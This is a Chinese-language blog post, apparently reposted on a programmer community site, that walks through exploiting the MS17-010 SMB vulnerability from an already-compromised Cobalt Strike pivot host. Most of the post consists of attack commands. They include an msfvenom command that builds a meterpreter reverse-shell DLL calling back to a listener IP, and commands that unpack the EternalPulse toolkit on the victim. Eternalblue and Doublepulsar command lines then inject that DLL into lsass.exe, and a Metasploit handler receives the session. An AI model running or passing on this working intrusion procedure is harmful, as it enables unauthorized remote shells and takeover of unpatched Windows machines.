MS17010原生打法

MS17010原生打法1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x

大家好,又见面了,我是你们的朋友全栈君。

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。

项目地址:https://github.com/TolgaSEZER/EternalPulse

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x64.dll

在这里插入图片描述
2、将dll文件拷贝到EternalPulse工具目录下打包成zip,上传到cobaltstrike已控机器中。
在这里插入图片描述
3、查看目标主机是否安装解压缩软件。
shell dir “C:\Program Files”
在这里插入图片描述
4、解压缩工具包。
shell “C:\Program Files\7-Zip\7z.exe” x EternalPulse.zip -oc:\EternalPulse
或WinRAR:
“C:\Program Files\WinRAR\rar.exe” x c:\test\EternalPulse.rar c:\test
在这里插入图片描述
在这里插入图片描述
如果没有解压缩工具,给主机上传单个的rar.exe或7z.exe也可。

5、进入到解压缩后的工具目录。
在这里插入图片描述6、种植后门。
Eternalblue-2.2.0.exe –InConfig Eternalblue-2.2.0.xml –TargetIp 存在17010漏洞的IP –TargetPort 445 –Target WIN72K8R2
(也可以不指定–Target)
在这里插入图片描述
7、msf开启监听。

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.3.128
set lport 4443
exploit -j

在这里插入图片描述
8、执行Doublepulsar-1.3.1.exe工具远程执行后门

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

在这里插入图片描述
9、msf成功接收session。
在这里插入图片描述
Ps:实战中应x32.dll,x64.dll都生成一份。使用Doublepulsar.exe的时候要写清参数的位数。dll在其他目录,也应指定好目录,如果没有cd到攻击程序文件夹路径的话,不光exe程序要指定绝对路径,同文件夹下的两个.xml文件也应指定绝对路径。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/130353.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号